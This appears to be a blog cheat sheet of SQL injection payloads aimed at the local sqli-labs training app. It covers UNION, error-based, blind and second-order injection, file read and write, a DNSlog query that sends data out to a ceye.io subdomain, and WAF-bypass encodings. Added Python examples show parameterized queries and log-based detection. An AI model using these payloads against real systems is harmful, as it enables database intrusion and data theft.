SQL injection + second-order injection + WAF bypass techniques

// PHP: print the SQL statement while debugging, so you can see the query the input lands in
echo $sql;
Confirm the number of columns (the injection position)
group by 1--+

UNION-based injection
Enumerate databases
SELECT GROUP_CONCAT(schema_name) FROM information_schema.`SCHEMATA`

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.`SCHEMATA`) --+
Enumerate tables
SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=database()

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=database()) --+
(the hard-coded form table_schema='security' works equally here)
Enumerate columns
SELECT GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_name='columns_priv'

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_name='users') --+

Dump data
SELECT GROUP_CONCAT(CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTION,MAXLEN) FROM information_schema.CHARACTER_SETS


localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(select concat_ws('~',id,username,password) from users limit 0,1) --+


Read a file
select load_file('path')

Write a file
select 'file contents' into outfile 'path/filename'
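The whole UNION chain above works only because the id parameter is pasted into the SQL string, which is exactly what echo $sql lets you see. The following is an added example, not code from the original post or from sqli-labs: a Python/SQLite stand-in for the Less-1 query, with the concatenated form beside its parameterized form plus an allowlist check on the id. The users table contents, the sqlite_master subquery standing in for information_schema, and all function names are assumptions made for the example.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the lab's "users" table (example rows, not the lab's data).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
    """)
    return con

def lookup_vulnerable(con, user_id):
    # Same shape as the Less-1 query: the request parameter is spliced into a quoted
    # literal, so a closing quote ends the literal and the rest of the input becomes SQL.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 1"
    return con.execute(sql).fetchall()

def lookup_hardened(con, user_id):
    # The value travels as a bound parameter; the statement text is fixed, so a quote,
    # UNION or comment marker inside the value is compared as data, never parsed.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return con.execute(sql, (user_id,)).fetchall()

def parse_id(raw):
    # Defence in depth: an id is a short positive integer; anything else is rejected
    # before it reaches the database layer (assumed validation rule).
    if not re.fullmatch(r"[1-9]\d{0,9}", raw):
        raise ValueError("id must be a positive integer")
    return int(raw)

# The page's UNION payload in decoded form ("--+" arrives as "-- "); the information_schema
# subquery is swapped for SQLite's catalogue table so the example runs offline.
PAYLOAD = "-2' union select 1,2,(select group_concat(name) from sqlite_master) -- "

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", lookup_vulnerable(con, PAYLOAD))  # injected row: [(1, 2, 'users')]
    print("hardened:  ", lookup_hardened(con, PAYLOAD))    # []
    try:
        parse_id(PAYLOAD)
    except ValueError as exc:
        print("rejected:  ", exc)
```

The concatenated version returns a row that does not exist in the table (the catalogue listing rides in on the third column), while the bound version compares the whole payload against the id column and finds nothing.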


Error-based injection
SELECT EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~'))

SELECT UPDATEXML(1,CONCAT('~',(SELECT USER()),'~'),1)

http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20(SELECT%20EXTRACTVALUE(1,CONCAT(%27~%27,(SELECT%20USER()),%27~%27)))%20--+


http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20(SELECT%20UPDATEXML%20(1,CONCAT(%27~%27,(SELECT%20USER()),%27~%27),1))%20--+


Boolean-based blind injection (comparing ASCII codes avoids single quotes)

LEFT((SELECT DATABASE()),1)='s'

http://localhost/sqli-labs-master/Less-8/?id=1' and LEFT((select DATABASE()),1)='S'--+

http://localhost/sqli-labs-master/Less-8/?id=1' and LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=database() limit 0,1),2)='em'--+

SELECT USER() REGEXP '^roo'
SELECT USER() LIKE 'ro%'


// (ASCII code) blind injection, the common form: check whether the page returns the true or the false response; the core is ASCII(*)=*
SELECT ASCII(SUBSTR((SELECT DATABASE()),1,1))=109

http://localhost/sqli-labs-master/Less-8/?id=1' and ASCII(SUBSTR((SELECT DATABASE()),1,1))=115--+

// query the table name: starting at the second character, take one character
http://localhost:8080/sqli-labs-master/Less-8/?id=1' and ASCII(SUBSTR((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=database() limit 0,1),2,1))=109--+


http://localhost/sqli-labs-master/Less-1/?id=1' and LEFT(DATABASE(),1)='s'--+

// Time-based blind injection: the core is sleep(); judge by the response time
http://localhost/sqli-labs-master/Less-10/?id=1"and if(left(User(),1)='a',0,sleep(5))--+

SELECT IF((SELECT LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=DATABASE() LIMIT 0,1),1)='o'),0,SLEEP(5))

http://localhost:8080/sqli-labs-master/Less-10/?id=1"and IF(LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=DATABASE() LIMIT 0,1),1)='q',0,SLEEP(5))--+
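Each of the blind and error-based variants above leaves a characteristic trace in the web server log: a burst of near-identical requests from one client that differ only in the substring position and the comparison value, sleep() calls paired with slow responses, or extractvalue()/updatexml() followed by a 500. The following is an added example (not from the original post) that classifies constructed access-log lines by those traces and summarises them per client. The log format with a trailing response-time field, the 3000 ms threshold, the signature regexes and the sample addresses are all assumptions of the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (sample data, not from the page): combined-log style with the
# response time in milliseconds appended as the final field.
LOG_LINES = [
    '10.0.0.5 - - [13/Jul/2020:16:54:01 +0800] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ASCII(SUBSTR((SELECT%20DATABASE()),1,1))=115--+ HTTP/1.1" 200 512 12',
    '10.0.0.5 - - [13/Jul/2020:16:54:02 +0800] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ASCII(SUBSTR((SELECT%20DATABASE()),2,1))=101--+ HTTP/1.1" 200 512 11',
    '10.0.0.5 - - [13/Jul/2020:16:54:03 +0800] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ASCII(SUBSTR((SELECT%20DATABASE()),3,1))=99--+ HTTP/1.1" 200 488 13',
    '10.0.0.5 - - [13/Jul/2020:16:54:09 +0800] "GET /sqli-labs-master/Less-10/?id=1%22and%20if(left(User(),1)=%27a%27,0,sleep(5))--+ HTTP/1.1" 200 512 5004',
    '10.0.0.5 - - [13/Jul/2020:16:54:15 +0800] "GET /sqli-labs-master/Less-1/?id=1%27%20and%20(SELECT%20EXTRACTVALUE(1,CONCAT(%27~%27,(SELECT%20USER()),%27~%27)))%20--+ HTTP/1.1" 500 301 9',
    '10.0.0.9 - - [13/Jul/2020:16:55:01 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 700 8',
    '10.0.0.9 - - [13/Jul/2020:16:55:02 +0800] "GET /sqli-labs-master/Less-1/?id=2 HTTP/1.1" 200 702 9',
]

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<elapsed>\d+)$')

# Signatures for the techniques described above, applied to the URL-decoded query string.
BOOLEAN_RE = re.compile(r"\b(?:ascii|ord|left|right|substr|substring|mid)\s*\(.*?(?:[=<>]|\blike\b|\bregexp\b)", re.I | re.S)
TIME_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
ERROR_RE = re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)
UNION_RE = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)
SLOW_MS = 3000  # assumed threshold: responses slower than this are suspicious on their own
LABELS = ("boolean", "time", "error", "union", "slow")

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    query = unquote_plus(target.partition("?")[2])  # %27 -> ', and the trailing --+ -> "-- "
    return {"client": m.group("client"), "path": target.partition("?")[0], "query": query,
            "status": int(m.group("status")), "elapsed_ms": int(m.group("elapsed"))}

def classify(query, elapsed_ms):
    # Returns every label that applies; a sleep() probe normally earns both "time" and "slow".
    labels = []
    if BOOLEAN_RE.search(query):
        labels.append("boolean")
    if TIME_RE.search(query):
        labels.append("time")
    if ERROR_RE.search(query):
        labels.append("error")
    if UNION_RE.search(query):
        labels.append("union")
    if elapsed_ms >= SLOW_MS:
        labels.append("slow")
    return labels

def analyze_log(lines):
    per_client = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_client.setdefault(rec["client"], {"requests": 0, **{k: 0 for k in LABELS}})
        stats["requests"] += 1
        for label in classify(rec["query"], rec["elapsed_ms"]):
            stats[label] += 1
    # Report only clients with at least one flagged request.
    return {ip: s for ip, s in per_client.items() if any(s[k] for k in LABELS)}

if __name__ == "__main__":
    for ip, stats in analyze_log(LOG_LINES).items():
        print(ip, stats)
```

The per-client counters are what matter operationally: one boolean-looking request can be noise, but a run of them with the position and comparison value stepping through the alphabet is the enumeration loop in action, and a sleep() probe that actually took five seconds shows the database executed it.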


DNSlog blind injection
Time-based blind injection needs too many requests and is easily blocked, so DNSlog blind injection is used instead
Go to: http://ceye.io/profile
Core syntax (the database server has to be running Windows)
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.MySQL.r4ourp.ceye.io\\abc'));

Second-order injection (registration and profile-edit pages)
Exploits data that is inserted into the database and later read back out without validation
admin'#
1' union select 1,(SELECT GROUP_CONCAT(schema_name )FROM information_schema.`SCHEMATA`),2#
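Second-order injection as described above, as an added example that is not part of the original post: the registration step stores the name admin'# with bound parameters, so it is stored verbatim, and a later password-change query either rebuilds SQL from that stored value or binds it. Built on Python's sqlite3 so it runs offline; the table layout, account names and function names are assumptions. SQLite does not treat # as a comment, so the concatenated form fails with a syntax error instead of silently reaching the admin row as it would on MySQL; either way the stored value has been handed to the SQL parser.

```python
import sqlite3

# Constructed users table with one privileged account (example data).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'original-admin-pw');
    """)
    return con

def register(con, username, password):
    # The registration page binds its parameters, so the name is stored exactly as typed,
    # quote and comment marker included. In isolation this step is correct.
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    con.commit()

def change_password_vulnerable(con, username, new_password):
    # The profile page later reads the stored name back and treats it as trusted because
    # "it came from the database", rebuilding SQL by string concatenation.
    sql = f"UPDATE users SET password='{new_password}' WHERE username='{username}'"
    try:
        cur = con.execute(sql)
        con.commit()
        return ("executed", cur.rowcount)
    except sqlite3.Error as exc:
        # The stored value reached the parser as SQL syntax rather than as data.
        # SQLite rejects the stray "#"; MySQL treats "#" as a comment, so there the WHERE
        # clause would end at username='admin' and the administrator's password would change.
        return ("parsed-as-sql", str(exc))

def change_password_hardened(con, username, new_password):
    # Bind parameters on every query, including ones whose inputs were read from the
    # database. Returns the number of rows updated.
    cur = con.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))
    con.commit()
    return cur.rowcount

def get_password(con, username):
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    con = make_db()
    register(con, "admin'#", "attacker-chosen")  # the registration payload from the page
    print(change_password_vulnerable(con, "admin'#", "replaced"))  # ('parsed-as-sql', ...)
    print(change_password_hardened(con, "admin'#", "new-pw"))      # 1
    print(get_password(con, "admin"))                              # original-admin-pw
```

The point of the hardened version is not the INSERT but the UPDATE: "came from our own database" is not a trust boundary, so every statement binds its values regardless of where they were read from.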

WAF bypass
Principles:
1. Architecture-level bypass
  1) Find the origin server -> against cloud WAFs
  2) Use the same network segment -> bypass the WAF's protected zone
  3) Use a boundary vulnerability -> bypass the WAF's protected zone
2. Bypass via resource limits
  1) Large POST body
3. Protocol-level bypass of WAF detection
  1) Protocols the WAF does not cover
    Change the request method: GET -> POST
    Change the Content-Type: application/x-www-form-urlencoded -> multipart/form-data
  2) Parameter pollution
4. Rule-level bypass
Main methods:
1. SQL comment bypass
union/**/select
union/*aaaa%01bbs*/select
union/*AAAAAAAAAAAAAAAAAA*/select
Inline (versioned) comment: /*!XXX*/
2. Whitespace bypass
MySQL whitespace: %09,%0A,%0B,%0D,%20,%0C,%A0,/*xxx*/
Whitespace as a regex engine sees it: %09,%0A,%0B,%0D,%20
union%250Cselect
3. Separators between function name and parenthesis
concat%2520(
concat/**/(
concat%250C(
concat%25a0(
4. Lexing of floating-point literals
select * from users where id=8E0union select 1,2,3
select * from users where id=8.0union select 1,2,3
select * from users where id=\Nunion select 1,2,3
5. Error-based SQL injection: the error-based functions are very easily overlooked by rule sets
extractvalue(1,concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
6. MySQL-specific syntax
select{x table_name}from{x information_schema.tables};

posted on 2020-07-13 16:54 by 想飞的猪ing  views (317)  comments (0)
